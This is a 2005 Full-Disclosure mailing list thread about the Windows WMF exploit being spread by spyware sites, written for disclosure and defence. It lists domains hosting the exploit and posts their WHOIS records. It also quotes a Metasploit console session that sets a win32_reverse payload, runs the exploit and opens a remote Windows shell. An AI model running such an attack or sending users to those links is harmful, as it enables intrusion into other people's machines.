-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I think you shouldnt be security specialist for putting crackz.ws in your banned website list , hehehe , this is probably the most funny warez site around there and I bet these loosers aren't knowing the number of ie exploits they are hosting on there own domain lol...
Paul wrote: > Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I > sent it to Microsoft a few days ago and they're looking into it. It looks > like it's going to be a bad week at MSRC :( > > I whoised the owners of a couple domains who host the image and got the > following information: > > Domain Name: BEEHAPPYY.BIZ > Domain ID: D9564716-BIZ > Sponsoring Registrar: ONLINENIC, INC. D/B/A > CHINA-CHANNEL.COM > Sponsoring Registrar IANA ID: 82 > Domain Status: ok > Registrant ID: OLNIC_919328_0_0 > Registrant Name: Mikhail Sergeevich Gorbachev > Registrant Organization: Mikhail Sergeevich Gorbachev > Registrant Address1: Krasnaya ploshad, 1 > Registrant City: Moscow > Registrant State/Province: Moscow > Registrant Postal Code: 176098 > Registrant Country: Russian Federation > Registrant Country Code: RU > Registrant Phone Number: +7.0957643453 > Registrant Facsimile Number: +7.0957643453 > Registrant Email: [EMAIL PROTECTED] > Administrative Contact ID: OLNIC_919328_1_0 > Administrative Contact Name: Mikhail Sergeevich Gorbachev > Administrative Contact Organization: Mikhail Sergeevich Gorbachev > Administrative Contact Address1: Krasnaya ploshad, 1 > Administrative Contact City: Moscow > Administrative Contact State/Province: Moscow > Administrative Contact Postal Code: 176098 > Administrative Contact Country: Russian Federation > Administrative Contact Country Code: RU > Administrative Contact Phone Number: +7.0957643453 > Administrative Contact Facsimile Number: +7.0957643453 > Administrative Contact Email: [EMAIL PROTECTED] > Billing Contact ID: OLNIC_919328_3_0 > Billing Contact Name: Mikhail Sergeevich Gorbachev > Billing Contact Organization: Mikhail Sergeevich Gorbachev > Billing Contact Address1: Krasnaya ploshad, 1 > Billing Contact City: Moscow > Billing Contact State/Province: Moscow > Billing Contact Postal Code: 176098 > Billing Contact Country: Russian Federation > Billing Contact Country Code: RU > Billing Contact Phone Number: +7.0957643453 > Billing Contact Facsimile Number: +7.0957643453 > Billing Contact Email: [EMAIL PROTECTED] > Technical Contact ID: OLNIC_919328_2_0 > Technical Contact Name: Mikhail Sergeevich Gorbachev > Technical Contact Organization: Mikhail Sergeevich Gorbachev > Technical Contact Address1: Krasnaya ploshad, 1 > Technical Contact City: Moscow > Technical Contact State/Province: Moscow > Technical Contact Postal Code: 176098 > Technical Contact Country: Russian Federation > Technical Contact Country Code: RU > Technical Contact Phone Number: +7.0957643453 > Technical Contact Facsimile Number: +7.0957643453 > Technical Contact Email: [EMAIL PROTECTED] > Name Server: NS1.PERLINK.BIZ > Name Server: NS2.PERLINK.BIZ > Created by Registrar: ONLINENIC, INC. D/B/A > CHINA-CHANNEL.COM > Last Updated by Registrar: ONLINENIC, INC. D/B/A > CHINA-CHANNEL.COM > Domain Registration Date: Tue Apr 26 15:43:16 GMT 2005 > Domain Expiration Date: Wed Apr 25 23:59:59 GMT 2007 > Domain Last Updated Date: Thu Aug 11 02:33:14 GMT 2005 > > > The name Mikhail Sergeevich Gorbachev that this domain is registered to > leads me to believe that it is registered with false information (for those > of you who don't know, Gorbachev was a former Soviet president). > > > Domain Name: BUYTOOLBAR.BIZ > Domain ID: D11475548-BIZ > Sponsoring Registrar: TLDS INC. > Sponsoring Registrar IANA ID: 320 > Domain Status: clientTransferProhibited > Registrant ID: 6464084-SRSPLUS > Registrant Name: Ezhi Brozkevitsh > Registrant Organization: Ezhi Brozkevitsh > Registrant Address1: Al. Armii Ludowej 24 > Registrant City: Warszawa > Registrant Postal Code: 00-609 > Registrant Country: Poland > Registrant Country Code: PL > Registrant Phone Number: +21.225798400 > Registrant Email: [EMAIL PROTECTED] > Administrative Contact ID: 6464085-SRSPLUS > Administrative Contact Name: Ezhi Brozkevitsh > Administrative Contact Organization: Ezhi Brozkevitsh > Administrative Contact Address1: Al. Armii Ludowej 24 > Administrative Contact City: Warszawa > Administrative Contact Postal Code: 00-609 > Administrative Contact Country: Poland > Administrative Contact Country Code: PL > Administrative Contact Phone Number: +21.225798400 > Administrative Contact Email: [EMAIL PROTECTED] > Billing Contact ID: 6464085-SRSPLUS > Billing Contact Name: Ezhi Brozkevitsh > Billing Contact Organization: Ezhi Brozkevitsh > Billing Contact Address1: Al. Armii Ludowej 24 > Billing Contact City: Warszawa > Billing Contact Postal Code: 00-609 > Billing Contact Country: Poland > Billing Contact Country Code: PL > Billing Contact Phone Number: +21.225798400 > Billing Contact Email: [EMAIL PROTECTED] > Technical Contact ID: 6464086-SRSPLUS > Technical Contact Name: Ezhi Brozkevitsh > Technical Contact Organization: Ezhi Brozkevitsh > Technical Contact Address1: Al. Armii Ludowej 24 > Technical Contact City: Warszawa > Technical Contact Postal Code: 00-609 > Technical Contact Country: Poland > Technical Contact Country Code: PL > Technical Contact Phone Number: +21.225798400 > Technical Contact Email: [EMAIL PROTECTED] > Name Server: NS1.BUYTOOLBAR.BIZ > Name Server: NS2.BUYTOOLBAR.BIZ > Created by Registrar: TLDS INC. > Last Updated by Registrar: TLDS INC. > Domain Registration Date: Mon Nov 14 08:00:27 GMT 2005 > Domain Expiration Date: Mon Nov 13 23:59:59 GMT 2006 > Domain Last Updated Date: Mon Nov 14 11:16:52 GMT 2005 > > This information does look promising. Iframeurl.biz is also registered to > the same individual. Perhaps the Polish authorities could apprehend this > culprit (either that, or a Polish reader of full-disclosure could pay him a > visit ;). That is, of course, assuming he is stupid enough to use his real > name to register a domain for illegal use. > > > Regards, > Paul > Greyhats Security > http://greyhatsecurity.org > > > > > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Eric Sites > Sent: Tuesday, December 27, 2005 11:02 PM > To: [email protected] > Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware... > > We are seeing a lot of website picking this exploit up. > > Examples: DON'T CLICK > > Crackz.ws > unionseek.com/d/t1/wmf_exp.htm > beehappyy.biz/parthner3/xpl.wmf > http://www.tfcco.com/xpl.wmf > Iframeurl.biz > > Cheers, > > Eric Sites > VP of Research & Development > Sunbelt Software > > email: [EMAIL PROTECTED] > Voice: 1-727-562-0101 x 276 > Cell: 1-727-637-2414 > Fax: 1-727-562-5199 > Web: http://www.sunbelt-software.com > Physical Address: > 101 N Garden Ave, > Suite 120 > Clearwater, FL, 33755 > United States > > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of H D > Moore > Sent: Tuesday, December 27, 2005 10:57 PM > To: [email protected] > Subject: [Full-disclosure] Someone wasted a nice bug on spyware... > > In reference to: > http://www.securityfocus.com/archive/1/420288/30/0/threaded > > I ported the exploit to the Metasploit Framework in case anyone wants to > > test it without installing a thousand spyware apps... > > Available from 'msfupdate' for MSF users, or in the 2.5 snapshot: > > --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metaf > ile > --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz > > Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1. > > -HD > > + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads] > > msf > use ie_xp_pfv_metafile > msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse > PAYLOAD -> win32_reverse > msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2 > LHOST -> 192.168.0.2 > msf ie_xp_pfv_metafile(win32_reverse) > exploit > > [*] Starting Reverse Handler. > [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf > [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP > [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061 > > Microsoft Windows XP [Version 5.1.2600] > (C) Copyright 1985-2001 Microsoft Corp. > > C:\Documents and Settings\XXXX\Desktop> > > > On Tuesday 27 December 2005 14:20, [EMAIL PROTECTED] wrote: >> Warning the following URL successfully exploited a fully patched >> windows xp system with a freshly updated norton anti virus. >> >> unionseek.com/d/t1/wmf_exp.htm >> >> The url runs a .wmf and executes the virus, f-secure will pick up the >> virus norton will not. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ7MRVq+LRXunxpxfAQITRg//dSLUa67EmG/r0v+2/rN6QxmkrbdZ9oF9 2v089NF4Hc9Ms/BcH8u61ZHXXJ3Ht2nMNpbhucsxH58rT9pZyGNQzOFs1qBxsymn /PHlIQPQuJrbLtODHDeTdnX+7WClRQdXkbysNzEEBJeFnvFlkNIHLMfizRqVKNS1 WRGftGKKGlvmQhVs9poIpYyUK5mirTU83L2sWQswFR6DcZj+yuvPnhpp4dRfsC2M oMxwLMVe2eyZvtCZucdluVX6Z/jWfdC7ZTxzKyCrRlrkmmR6ItXP5HhVqq4hodhz gG5KGx2Qa4DJS1kMw6mXMhg2OoWhaHEDHOv7S5XKINlPHaQzv/HxAssOdjjShxVZ ZvmozA7odlWmSvlz6SkJYNZjxBDvzFvIg86SMXe/s3mh3zZuBbxVyQ9vEw0v8JA1 /500hCIQ2fM0jNzRbcYwFkzrWSTL/vWBTes3q6s4YLNx/XQfMZE+YSgFYcuGEqh1 0lDeNzu/J8E2mnfJLLe0qMMeRzXvZOIe4cU3kYHINzSl0XiSdwNylrKSVyIuWYc4 7eD41YD3LQIjhL+nWYG8pSdsyceQLrUO0+s0L5mQCkTFRpzJp5mag0DnU4IugfyI wLSe3jesj3VOhQeeVgB4ZPdxrh3ukmqumJVKZhgdE4uVgsSuiNvWCyYigM0TCC18 TID7YC6EZD8= =SY6l -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
